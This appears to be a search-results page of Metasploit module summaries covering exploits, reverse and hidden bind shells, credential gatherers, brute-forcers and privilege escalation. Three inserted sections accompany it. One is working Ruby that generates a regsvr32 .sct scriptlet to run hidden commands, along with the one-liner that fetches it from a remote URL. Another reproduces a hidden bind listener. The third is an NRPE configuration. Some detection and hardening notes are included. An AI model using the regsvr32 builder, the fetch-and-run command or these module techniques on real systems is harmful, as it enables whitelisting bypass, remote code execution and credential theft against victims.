6847 matches found
MediaWiki SyntaxHighlight extension option injection vulnerability
This module exploits an option injection vulnerability in the SyntaxHighlight extension of MediaWiki. It tries to create & execute a PHP file in the document root. The USERNAME & PASSWORD options are only needed if the Wiki is configured as private. This vulnerability affects any MediaWiki...
Varnish Cache CLI Login Utility
This module attempts to login to the Varnish Cache varnishd CLI instance using a bruteforce list of passwords. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' requir...
Android Meterpreter Shell, Reverse TCP Inline
Connect back to the attacker and spawn a Meterpreter shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::TransportConfig include Msf::Payload::Sing...
OpenNMS Java Object Unserialization Remote Code Execution
This module exploits a Java object unserialization vulnerability in OpenNMS which allows an unauthenticated attacker to run arbitrary code against the system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Regsvr32.exe (.sct) Command Delivery Server
This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on a target system. The major advantage of this technique is that you can execute a static command on the target system and dynamically and remotely change the command that will actually run by...
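The two halves of this technique are the static regsvr32 one-liner that stays on the target and the COM scriptlet (.sct) that the server hands out. The following Ruby is an added example written for this page, not the module's own code: it builds a scriptlet that runs a command through WScript.Shell and prints the one-liner that fetches it. The progid, the generated classid, the command and the URL are all placeholders.

```ruby
require 'securerandom'

# Builds a COM scriptlet (.sct) that scrobj.dll will execute when regsvr32
# loads it. The <registration> element needs a progid and a classid; both are
# arbitrary here, the classid is simply a fresh GUID (assumed, not from the page).
def build_sct(cmd, classid: SecureRandom.uuid.upcase)
  # The command lands inside a JScript string literal, so escape backslashes
  # and double quotes (block form of gsub avoids replacement-string escaping).
  js_cmd = cmd.gsub('\\') { '\\\\' }.gsub('"') { '\\"' }
  <<~SCT
    <?XML version="1.0"?>
    <scriptlet>
      <registration progid="ExampleScriptlet" classid="{#{classid}}">
        <script language="JScript">
          <![CDATA[
            var shell = new ActiveXObject("WScript.Shell");
            // window style 0 = hidden; false = do not wait for the command
            shell.Run("#{js_cmd}", 0, false);
          ]]>
        </script>
      </registration>
    </scriptlet>
  SCT
end

# The static one-liner. /s silent, /n skip DllRegisterServer, /u call the
# uninstall path (which runs DllInstall), /i:<url> is passed to DllInstall,
# and scrobj.dll is the scriptlet host. Only the served .sct needs to change
# to change what runs on the target.
def regsvr32_command(url)
  "regsvr32.exe /s /n /u /i:#{url} scrobj.dll"
end

if __FILE__ == $0
  # Example values only: an attacker-controlled URL and a harmless command.
  puts regsvr32_command('http://192.0.2.10/payload.sct')
  puts build_sct('cmd.exe /c calc.exe')
end
```

Detection follows from the same two halves: a regsvr32.exe process whose command line carries `/i:http` together with `scrobj.dll`, or an outbound HTTP request from regsvr32.exe, is the signal defenders look for, and blocking regsvr32 from reaching the network breaks the delivery step without touching the binary itself.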
Android ADB Debug Server Remote Payload Execution
Writes and spawns a native payload on an android device that is listening for adb debug messages. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Android ADB Debug Server Remote Payload...
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
VMWare Update Manager 4 Directory Traversal
This module exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4. This module requires Metasploit: https://metasploit.com/download Current sourc...
BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Connect back to attacker and spawn a command shell over IPv6 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 105 include Msf::Payload::Single include Msf::Payload::Bsd include...
Windows Gather Active Directory BitLocker Recovery
This module will enumerate BitLocker recovery passwords in the default AD directory. This module does require Domain Admin or other delegated privileges. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
BSD x64 Execute Command
Execute an arbitrary command This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exec ---- Executes an arbitrary command. module MetasploitModule CachedSize = 31 include Msf::Payload::Single include Msf::Payload::Bsd def...
Belkin Play N750 login.cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated attackers to execute...
Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation
This module exploits a stacked SQL injection in order to add an administrator user to the SolarWinds Orion database. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Solarwinds Orion...
PXE Boot Exploit Server
This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid...
MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
This module exploits a universal cross-site scripting UXSS vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGETURI which cannot have X-Frame-Options or it will fail. You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastl...
WordPress Pixabay Images PHP Code Upload
This module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images 2.3.6. The plugin does not check the host of a provided download URL which can be used to store and execute malicious PHP code on the system. This module requires Metasploit: https://metasploit.com/download Curre...
Reflective DLL Injection, Hidden Bind TCP Stager
Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...
VNC Server (Reflective Injection), Hidden Bind TCP Stager
Inject a VNC Dll via a reflective loader staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...
Tincd Post-Authentication Remote TCP Stack Buffer Overflow
This module exploits a stack buffer overflow in Tinc's tincd service. After authentication, a specially crafted TCP packet (default port 655) leads to a buffer overflow and allows arbitrary code execution. This module has been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows ...
GNU Wget FTP Symlink Arbitrary Filesystem Access
This module exploits a vulnerability in Wget when used in recursive (-r) mode with an FTP server as a destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGETDATA option. Tested successfully with...
HP Network Node Manager I PMD Buffer Overflow
This module exploits a stack buffer overflow in HP Network Node Manager I NNMi. The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stackoption packets with user controlled data. In order to bypass ASLR this module uses a...
Railo Remote File Include
This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append...
Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site and project usernames and...
Windows Command Shell, Hidden Bind TCP Inline
Listen for a connection from a certain IP and spawn a command shell. The shellcode replies with a RST packet if the connection is not coming from the IP defined in AHOST, so to anyone else the port appears "closed", which helps hide the shellcode. This module requires Metasploit:...
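The hidden-bind behaviour is easy to reproduce from user space, which is useful both for understanding what a scanner sees and for testing detections. The Ruby below is an added example for this page, not the payload's code: it accepts a connection, compares the peer with an AHOST value, and drops non-matching peers with a TCP RST by closing with SO_LINGER set to zero seconds (the kernel then sends RST instead of FIN). The loopback addresses and the "connected" banner standing in for a real shell are assumptions.

```ruby
require 'socket'
require 'ipaddr'

# The shellcode's rule: only the peer named in AHOST is served.
def allowed_peer?(peer_ip, ahost)
  IPAddr.new(peer_ip) == IPAddr.new(ahost)
rescue IPAddr::InvalidAddressError
  false
end

# SO_LINGER {l_onoff=1, l_linger=0} makes close() abort the connection with
# RST rather than the usual FIN exchange; the peer sees "connection reset",
# which is what a closed port looks like to most scanners.
def reject_with_rst(sock)
  sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_LINGER, [1, 0].pack('ii'))
  sock.close
end

# Returns :shell or :rst so the decision is observable without a real payload.
def handle_client(sock, ahost)
  peer_ip = sock.remote_address.ip_address
  if allowed_peer?(peer_ip, ahost)
    sock.write("connected\n") # stand-in for attaching cmd.exe to this socket
    :shell
  else
    reject_with_rst(sock)
    :rst
  end
end

# Loopback demonstration on an ephemeral port (assumed addresses).
def demo(ahost)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  client = TCPSocket.new('127.0.0.1', port)
  decision = handle_client(server.accept, ahost)
  client.close
  server.close
  decision
end

if __FILE__ == $0
  puts demo('127.0.0.1')   # :shell, loopback peer matches AHOST
  puts demo('203.0.113.9') # :rst, loopback peer is rejected with RST
end
```

The practical caveat is that "closed" is only an appearance: the socket is still bound, so `netstat -an` on the host lists it in LISTENING state, and a SYN from the allowed address still completes the handshake. Host-side inspection, not a remote port scan, is the reliable way to find it.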
Adobe Flash Player Regular Expression Heap Overflow
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, a...
SerComm Device Configuration Dump
This module will dump the configuration of several SerComm devices. These devices typically include routers from NetGear and Linksys. This module was tested successfully against the NetGear DG834 series ADSL modem router. This module requires Metasploit: https://metasploit.com/download Current...
OSX Screen Capture
This module takes screenshots of target desktop and automatically downloads them. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OSX Screen Capture', 'Description' = %q This module takes...
OSX VPN Manager
This module lists VPN connections and tries to connect to them using stored credentials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OSX VPN Manager', 'Description' = %q This module lists V...
Oracle Endeca Server Remote Command Execution
This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. In addition, t...
WordPress Brute Force and User Enumeration Utility
WordPress Authentication Brute Force and User Enumeration Utility This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Brute Force and User Enumeration Utility', 'Description' = 'WordPress...
MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. This issue affects Windows Vista, 7, 8, Server 2008, Server 2008...
Nagios Remote Plugin Executor Arbitrary Command Execution
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option, dont_blame_nrpe, which enables command-line arguments to be provided to remote plugins. When this option is enabled, even when NR...
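The setting in question lives in nrpe.cfg. The fragment below is an added illustration, not configuration from the page: the first block is the weak form the module relies on, where values sent by a remote check_nrpe client are substituted for $ARG1$ and $ARG2$ before the command runs; the second is the hardened form, where arguments are refused and every command is fully specified on the server. The plugin path and the allowed_hosts addresses are placeholders.

```ini
# nrpe.cfg, weak: remote clients supply arguments that NRPE pastes into the
# command line (only effective when NRPE was built with --enable-command-args).
dont_blame_nrpe=1
command[check_users]=/usr/lib/nagios/plugins/check_users -w $ARG1$ -c $ARG2$

# nrpe.cfg, hardened: no client-supplied arguments, thresholds fixed server-side,
# and only the monitoring server may connect.
dont_blame_nrpe=0
command[check_users]=/usr/lib/nagios/plugins/check_users -w 5 -c 10
allowed_hosts=127.0.0.1,192.0.2.20
```

Two checks are worth running on a host that has NRPE: `grep -n dont_blame_nrpe /etc/nagios/nrpe.cfg` (or wherever the distribution installs it) and a look at every command[...] line that still contains $ARG; each of those is a command line that a client can partly control.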
SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to execute OS commands as configured in the SM69 transaction. This module requires Metasploit: https://metasploit.com/download Current source:...
Avaya WinPMD UniteHostRouter Buffer Overflow
This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted "To:" headers. The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 20...
FlexNet License Server Manager lmgrd Buffer Overflow
This module exploits a vulnerability in the FlexNet License Server Manager. The vulnerability is due to the insecure usage of memcpy in the lmgrd service when handling network packets, which results in a stack buffer overflow. In order to improve reliability, this module will make lots of...
OS X Gather Colloquy Enumeration
This module will collect Colloquy's info plist file and chat logs from the victim's machine. There are three actions you may choose: INFO, CHATS, and ALL. Please note that the CHATS action may take a long time depending on the victim machine, therefore we suggest setting the regex 'PATTERN' option ...
Windows x64 LoadLibrary Path
Load an arbitrary x64 library path This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 285 include Msf::Payload::Windows include Msf::Payload::Single def initializeinfo =...
phpLDAPadmin query_engine Remote PHP Code Injection
This module exploits a vulnerability in lib/functions.php for phpLDAPadmin versions 1.2.1.1 and earlier that allows attacker-supplied input to be passed directly to PHP's create_function. A patch was issued that uses a whitelist regular expression to check the user-supplied input before it is parse...
Windows Gather Meebo Password Extractor
This module extracts login account password stored by Meebo Notifier, a desktop version of Meebo's Online Messenger. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Meebo Passwor...
Windows Gather Enumerate Domain
This module identifies the primary Active Directory domain name and domain controller. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Enumerate Domain', 'Description' = %q This...
Windows Gather Directory Permissions Enumeration
This module enumerates directories and lists the permissions set on found directories. Please note: if the PATH option isn't specified, the module will start enumerating whatever is in the target machine's %PATH% variable. This module requires Metasploit: https://metasploit.com/download Curren...
SMB Scanner Check File/Directory Utility
This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. An example would be to scan all systems for the presence of antivirus or known malware outbreak. Typically you must set RPATH, SMBUser, SMBDomain and SMBPass to operate correctly. Thi...
Windows Manage Inject in Memory Multiple Payloads
This module injects a given payload into several processes, each connecting back to a given list of IP addresses. The module works with a given list of IP addresses and process PIDs; if no PID is given it will start the process named in the advanced options and inject the selected payload into t...
SAP Management Console Version Detection
This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SAP Management Console Version...
SAP Management Console Extract Users
This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SAP Management Console...
Windows Speech API - Say "You Got Pwned!"
Causes the target to say "You Got Pwned" via the Windows Speech API This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework =begin https://www.exploit-db.com/sploits/w32-speaking-shellcode.zip Copyright (c) 2009-2010 Berend-Jan...
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 Build 6.1.8.10. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
BACnet OPC Client Buffer Overflow
This module exploits a stack buffer overflow in SCADA Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client parses a specially crafted csv file, arbitrary code may be executed. This module requires Metasploit: https://metasploit.com/download Current source:...
Java Meterpreter, Java Bind TCP Stager
Run a meterpreter server in Java. Listen for a connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 5256 include Msf::Payload::Stager include Msf::Payload::Java include...
VxWorks WDB Agent Boot Parameter Scanner
Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VxWorks WDB Agent Boot Parameter Scanner', 'Description' = 'Scan...